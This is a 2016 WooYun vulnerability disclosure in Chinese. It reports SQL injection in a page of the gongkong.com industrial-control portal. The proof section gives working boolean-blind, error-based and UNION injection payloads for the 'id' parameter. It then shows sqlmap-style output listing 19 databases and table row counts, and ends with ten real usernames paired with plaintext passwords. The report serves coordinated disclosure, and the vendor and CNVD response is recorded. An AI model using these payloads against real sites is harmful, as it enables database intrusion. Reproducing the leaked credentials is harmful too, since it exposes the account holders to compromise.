漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2016-0168293
漏洞标题:中国工控网全网某漏洞可影响三百三十万明文用户数据含密码
相关厂商:工控网(北京)信息技术股份有限公司
漏洞作者: 路人甲
提交时间:2016-01-08 10:26
修复时间:2016-02-22 16:48
公开时间:2016-02-22 16:48
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2016-01-08: 细节已通知厂商并且等待厂商处理中
2016-01-12: 厂商已经确认,细节仅向厂商公开
2016-01-22: 细节向核心白帽子及相关领域专家公开
2016-02-01: 细节向普通白帽子公开
2016-02-11: 细节向实习白帽子公开
简要描述:
中国工控网全网某漏洞可影响亿万级记录+三百三十万明文用户密码测漏#2
详细说明:
http://**.**.**.**/customer/vacon1/example_detail.asp?id=2014042813351300001
漏洞证明:
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=20071224141142976BB' AND 9351=9351 AND 'JmEG'='JmEG
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: id=20071224141142976BB' AND 9996=CONVERT(INT,(SELECT CHAR(113)+CHAR(110)+CHAR(117)+CHAR(108)+CHAR(113)+(SELECT (CASE WHEN (9996=9996) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(102)+CHAR(99)+CHAR(102)+CHAR(113))) AND 'HoDs'='HoDs
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-9024' UNION ALL SELECT NULL,CHAR(113)+CHAR(110)+CHAR(117)+CHAR(108)+CHAR(113)+CHAR(101)+CHAR(77)+CHAR(71)+CHAR(103)+CHAR(99)+CHAR(114)+CHAR(119)+CHAR(78)+CHAR(74)+CHAR(98)+CHAR(113)+CHAR(102)+CHAR(99)+CHAR(102)+CHAR(113),NULL--
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
available databases [19]:
[*] aspnetdb
[*] blog
[*] edc
[*] exam
[*] GkNetAid
[*] GkRegUser
[*] gkstudy
[*] gksystem
[*] gongkong_1
[*] gongkonghelp
[*] gongkongNet
[*] gongkongnetpro
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] xuegongkong
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
Database: gongkongNet
+--------------------------------------+---------+
| Table | Entries |
+--------------------------------------+---------+
| dbo.WVisit | 30162070 |
| dbo.WVisit | 30162070 |
| dbo.RegUserLoginHistory | 25208213 |
| dbo.RegUserLoginHistory | 25208213 |
| dbo.RecordIP | 17310040 |
| dbo.RecordIP | 17310040 |
| dbo.InfoPublicationLog | 15321119 |
| dbo.InfoPublicationLog | 15321119 |
| dbo.BaseProductModelParameter | 9287436 |
| dbo.BaseProductModelParameter | 9287436 |
| dbo.MPRuleHistory | 4369309 |
| dbo.MPRuleHistory | 4369309 |
| dbo.DownloadDetail | 3834056 |
| dbo.DownloadDetail | 3834056 |
| dbo.RegUserView | 3356628 |
| dbo.RegUserView | 3356628 |
| dbo.ForumReplyUserView | 2865328 |
| dbo.ForumReplyUserView | 2865328 |
| dbo.BADViewHistory | 2697192 |
| dbo.BADViewHistory | 2697192 |
| dbo.Message | 2588390 |
| dbo.Message | 2588390 |
| dbo.CoAdAssoViewHistory | 2508874 |
| dbo.CoAdAssoViewHistory | 2508874 |
| dbo.special_magazine_info_access | 2180205 |
| dbo.special_magazine_info_access | 2180205 |
| dbo.RegUserMemberInfo | 2084062 |
| dbo.RegUserMemberInfo | 2084062 |
| dbo.RegUserPointvalue | 1780304 |
| dbo.RegUserPointvalue | 1780304 |
| dbo._temp_Stock4Custom_all | 1384908 |
| dbo._temp_Stock4Custom_all | 1384908 |
| dbo.UserHistory | 1289783 |
| dbo.UserHistory | 1289783 |
| dbo.CommonAuditTrace | 1233016 |
| dbo.CommonAuditTrace | 1233016 |
| dbo.SearchKeyWords | 1044790 |
| dbo.SearchKeyWords | 1044790 |
| dbo.MPExchangeDetail | 1043878 |
| dbo.MPExchangeDetail | 1043878 |
| dbo.tb_index | 1042079 |
| dbo.tb_index | 1042079 |
| dbo.MmsOrder | 928286 |
| dbo.MmsOrder | 928286 |
| dbo.smsOrder | 927693 |
| dbo.smsOrder | 927693 |
| dbo.V_Product_IndustryTech | 878915 |
| dbo.V_Product_IndustryTech | 878915 |
| dbo.ProductIndustry | 878635 |
| dbo.ProductIndustry | 878635 |
| dbo.RegUserActivation | 782035 |
| dbo.RegUserActivation | 782035 |
| dbo.BizTrades | 741181 |
| dbo.BizTrades | 741181 |
| dbo.HrPositionCompanyProductView | 679729 |
| dbo.HrPositionCompanyProductView | 679729 |
| dbo.CompanyAsso | 670798 |
| dbo.CompanyAsso | 670798 |
| dbo.BizTradeProductTypeBrandView | 581070 |
| dbo.BizTradeProductTypeBrandView | 581070 |
| dbo.QuestVote | 564983 |
| dbo.QuestVote | 564983 |
| dbo.temp_index | 510302 |
| dbo.temp_index | 510302 |
| dbo.ViewForumTopicPink | 488787 |
| dbo.ViewForumTopicPink | 488787 |
| dbo.ForumTopicsByGategory | 488765 |
| dbo.ForumTopicsByGategory | 488765 |
| dbo.v_Forum_List | 464260 |
| dbo.v_Forum_List | 464260 |
| dbo.CommonFeedback | 442591 |
| dbo.CommonFeedback | 442591 |
| dbo.BizSaleSelectedModel | 433615 |
| dbo.BizSaleSelectedModel | 433615 |
| dbo.ViewBizSaleModel | 428988 |
| dbo.ViewBizSaleModel | 428988 |
| dbo.IpDataBase | 417423 |
| dbo.IpDataBase | 417423 |
| dbo.CommonFeedBackUserView | 404751 |
| dbo.CommonFeedBackUserView | 404751 |
| dbo.IpAddress | 357178 |
| dbo.IpAddress | 357178 |
| dbo.TempIndustryProducts | 347001 |
| dbo.TempIndustryProducts | 347001 |
| dbo.ViewTmpBbs | 342218 |
| dbo.ViewTmpBbs | 342218 |
| dbo.ComContMutuality | 330367 |
| dbo.ComContMutuality | 330367 |
| dbo.OnlineProsemQuestion | 303320 |
| dbo.OnlineProsemQuestion | 303320 |
| dbo.HrReceiptResume | 265447 |
| dbo.HrReceiptResume | 265447 |
| dbo.ViewHrPositionResume | 265447 |
| dbo.ViewHrPositionResume | 265447 |
| dbo.ViewHrUserResume | 265447 |
| dbo.ViewHrUserResume | 265447 |
| dbo.BaseProductModel | 260903 |
| dbo.BaseProductModel | 260903 |
| dbo.BaseProductModelView | 260903 |
| dbo.BaseProductModelView | 260903 |
| dbo.HomeUserClickRecord | 253864 |
| dbo.HomeUserClickRecord | 253864 |
| dbo.BaseProductModel3 | 248096 |
| dbo.BaseProductModel3 | 248096 |
| dbo.Photo | 244009 |
| dbo.Photo | 244009 |
| dbo.ProductsByIProductTypeViews | 241597 |
| dbo.ProductsByIProductTypeViews | 241597 |
| dbo.BaseIProductTypeProductViews | 241006 |
| dbo.BaseIProductTypeProductViews | 241006 |
| dbo.CompanyProductTypeIdView | 211556 |
| dbo.CompanyProductTypeIdView | 211556 |
| dbo.ViewNewsSolutionDatumTutorial | 196764 |
| dbo.ViewNewsSolutionDatumTutorial | 196764 |
| dbo.RegUserVisitHistory | 196126 |
| dbo.RegUserVisitHistory | 196126 |
| dbo.IndustryChannelIndustryNewsView | 191583 |
| dbo.IndustryChannelIndustryNewsView | 191583 |
| dbo.TempIndustryCompany | 190784 |
| dbo.TempIndustryCompany | 190784 |
| dbo._bak4City | 182714 |
| dbo._bak4City | 182714 |
| dbo.TechArticleIndustry | 178309 |
| dbo.TechArticleIndustry | 178309 |
| dbo._bak4Category | 176725 |
| dbo._bak4Category | 176725 |
| dbo.ViewTechArticleIndustry | 176647 |
| dbo.ViewTechArticleIndustry | 176647 |
| dbo.RegUserFavorite | 174092 |
| dbo.RegUserFavorite | 174092 |
| dbo._bak4Intent | 163031 |
| dbo._bak4Intent | 163031 |
| dbo.BizSalesProdutType | 162029 |
| dbo.BizSalesProdutType | 162029 |
| dbo.ProductProductType | 161109 |
| dbo.ProductProductType | 161109 |
| dbo.ProductsByProductTypeView | 159652 |
| dbo.ProductsByProductTypeView | 159652 |
| dbo.V_TechArticle_IndustryTech | 158802 |
| dbo.V_TechArticle_IndustryTech | 158802 |
| dbo.ViewProductsByMinPcode | 157910 |
| dbo.ViewProductsByMinPcode | 157910 |
| dbo.ViewProductsByMin | 156775 |
| dbo.ViewProductsByMin | 156775 |
| dbo.ViewProductsByMidPcode | 156452 |
| dbo.ViewProductsByMidPcode | 156452 |
| dbo.V_Product_PRunPType | 156202 |
| dbo.V_Product_PRunPType | 156202 |
| dbo.ViewProductsByMid | 155317 |
| dbo.ViewProductsByMid | 155317 |
| dbo.V_BizSales_PRunPType | 152804 |
| dbo.V_BizSales_PRunPType | 152804 |
| dbo.OnlineLogins | 146661 |
| dbo.OnlineLogins | 146661 |
| dbo.WInfo | 145529 |
| dbo.WInfo | 145529 |
| dbo.CommonFeedbackStat | 144176 |
| dbo.CommonFeedbackStat | 144176 |
| dbo.CompanyProductyType | 143719 |
| dbo.CompanyProductyType | 143719 |
| dbo.ViewCompanyIDByMinPcode | 141632 |
| dbo.ViewCompanyIDByMinPcode | 141632 |
| dbo.ViewCompanysByMinPcode | 141603 |
| dbo.ViewCompanysByMinPcode | 141603 |
| dbo.ViewCompanyIDByMidPcode | 140665 |
| dbo.ViewCompanyIDByMidPcode | 140665 |
| dbo.ViewCompanysByMidPcode | 140636 |
| dbo.ViewCompanysByMidPcode | 140636 |
| dbo.RegUserFriend | 138018 |
| dbo.RegUserFriend | 138018 |
| dbo.V_Company_PRunPType | 137827 |
| dbo.V_Company_PRunPType | 137827 |
| dbo.ViewCompanyCtypePtype | 137777 |
| dbo.ViewCompanyCtypePtype | 137777 |
| dbo.NewsProductType | 137251 |
| dbo.NewsProductType | 137251 |
| dbo.V_News_PRunPType | 136735 |
| dbo.V_News_PRunPType | 136735 |
| dbo.V_News_IndustryTech | 135954 |
| dbo.V_News_IndustryTech | 135954 |
| dbo.NewsIndustry | 134103 |
| dbo.NewsIndustry | 134103 |
| dbo.ViewHYTJNews | 134103 |
| dbo.ViewHYTJNews | 134103 |
| dbo._temp_ProductModel4Custom_all | 133497 |
| dbo._temp_ProductModel4Custom_all | 133497 |
| dbo.BaseProductModel2 | 132815 |
| dbo.BaseProductModel2 | 132815 |
| dbo.SlcStatic | 130790 |
| dbo.SlcStatic | 130790 |
| dbo.V_Datum_PRunPType | 124452 |
| dbo.V_Datum_PRunPType | 124452 |
| dbo.DatumProdutType | 124262 |
| dbo.DatumProdutType | 124262 |
| dbo.DatumProductTypeView | 124260 |
| dbo.DatumProductTypeView | 124260 |
| dbo.CompanyMenu | 123661 |
| dbo.CompanyMenu | 123661 |
| dbo.ViewTechnicCommend | 120467 |
| dbo.ViewTechnicCommend | 120467 |
| dbo.NewsByProductTypeView | 116402 |
| dbo.NewsByProductTypeView | 116402 |
| dbo.ViewNewsByPtype | 115990 |
| dbo.ViewNewsByPtype | 115990 |
| dbo.ViewNewsIdByPtype | 115990 |
| dbo.ViewNewsIdByPtype | 115990 |
| dbo.DatumFreeReguser | 111432 |
| dbo.DatumFreeReguser | 111432 |
| dbo.RegUserGroupMember | 110873 |
| dbo.RegUserGroupMember | 110873 |
| dbo.researchVisit | 108089 |
| dbo.researchVisit | 108089 |
| dbo.HrUserBase | 107618 |
| dbo.HrUserBase | 107618 |
| dbo.ViewHrUserInfo | 107618 |
| dbo.ViewHrUserInfo | 107618 |
| dbo.V_TechArticle_PRunPType | 106173 |
| dbo.V_TechArticle_PRunPType | 106173 |
| dbo.TechArticleProductType | 104947 |
| dbo.TechArticleProductType | 104947 |
| dbo.ViewDatumByPtype | 104370 |
| dbo.ViewDatumByPtype | 104370 |
| dbo.ViewDatumIdByPtype | 104370 |
| dbo.ViewDatumIdByPtype | 104370 |
| dbo.HrUserIntent | 103726 |
| dbo.HrUserIntent | 103726 |
| dbo.ViewProductByMaxPtype | 103416 |
| dbo.ViewProductByMaxPtype | 103416 |
| dbo.ViewProductIdByMaxPtype | 103416 |
| dbo.ViewProductIdByMaxPtype | 103416 |
| dbo.BizSalesProductTypeView | 101703 |
| dbo.BizSalesProductTypeView | 101703 |
| dbo.V_Datum_IndustryTech | 101521 |
| dbo.V_Datum_IndustryTech | 101521 |
| dbo.ViewProductsByMaxPcode | 101465 |
| dbo.ViewProductsByMaxPcode | 101465 |
| dbo.DatumIndustry | 100843 |
| dbo.DatumIndustry | 100843 |
| dbo.ViewProductsByMax | 100608 |
| dbo.ViewProductsByMax | 100608 |
| dbo.ViewCompanyIDByMaxPcode | 99994 |
| dbo.ViewCompanyIDByMaxPcode | 99994 |
| dbo.ViewCompanysByMaxPcode | 99979 |
| dbo.ViewCompanysByMaxPcode | 99979 |
| dbo.RegUserIndustry | 96502 |
| dbo.RegUserIndustry | 96502 |
| dbo.News | 93034 |
| dbo.News | 93034 |
| dbo.ViewCompanyIdByPtype | 91908 |
| dbo.ViewCompanyIdByPtype | 91908 |
| dbo.ViewCompanyByPtype | 91895 |
| dbo.ViewCompanyByPtype | 91895 |
| dbo.ViewSaleModel | 91152 |
| dbo.ViewSaleModel | 91152 |
| dbo.Product | 89566 |
| dbo.Product | 89566 |
| dbo.ProductProductCustomType | 88075 |
| dbo.ProductProductCustomType | 88075 |
| dbo.BizSaleProductTypeView | 85618 |
| dbo.BizSaleProductTypeView | 85618 |
| dbo.OnlineProsemAnswer | 85028 |
| dbo.OnlineProsemAnswer | 85028 |
| dbo.ForumTopic3 | 84598 |
| dbo.ForumTopic3 | 84598 |
| dbo.ProseminarRecord | 84513 |
Database: gongkongNet
Table: RegUserView
[10 entries]
+-------------+-----------------+
| password | loginName |
+-------------+-----------------+
| ------ | kangjiejing |
| 220167 | liuming_liuming |
| ,./jin | jinyuw |
| 2320003166 | 2320003166_EBN |
| 321boyuan | boyuan123_EBN |
| 451355745 | 镇江曾倩洲ZENG |
| 530375 | LDXHJ |
| 996613 | J716 |
| bzpeter | bzpeter |
| JXD2013bp | nfe9100_EBN |
+-------------+-----------------+
修复方案:
参数过滤
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:10
确认时间:2016-01-12 16:22
厂商回复:
CNVD确认并复现所述情况,已由CNVD通过网站管理方公开联系渠道向其邮件通报,由其后续提供解决方案。
最新状态:
暂无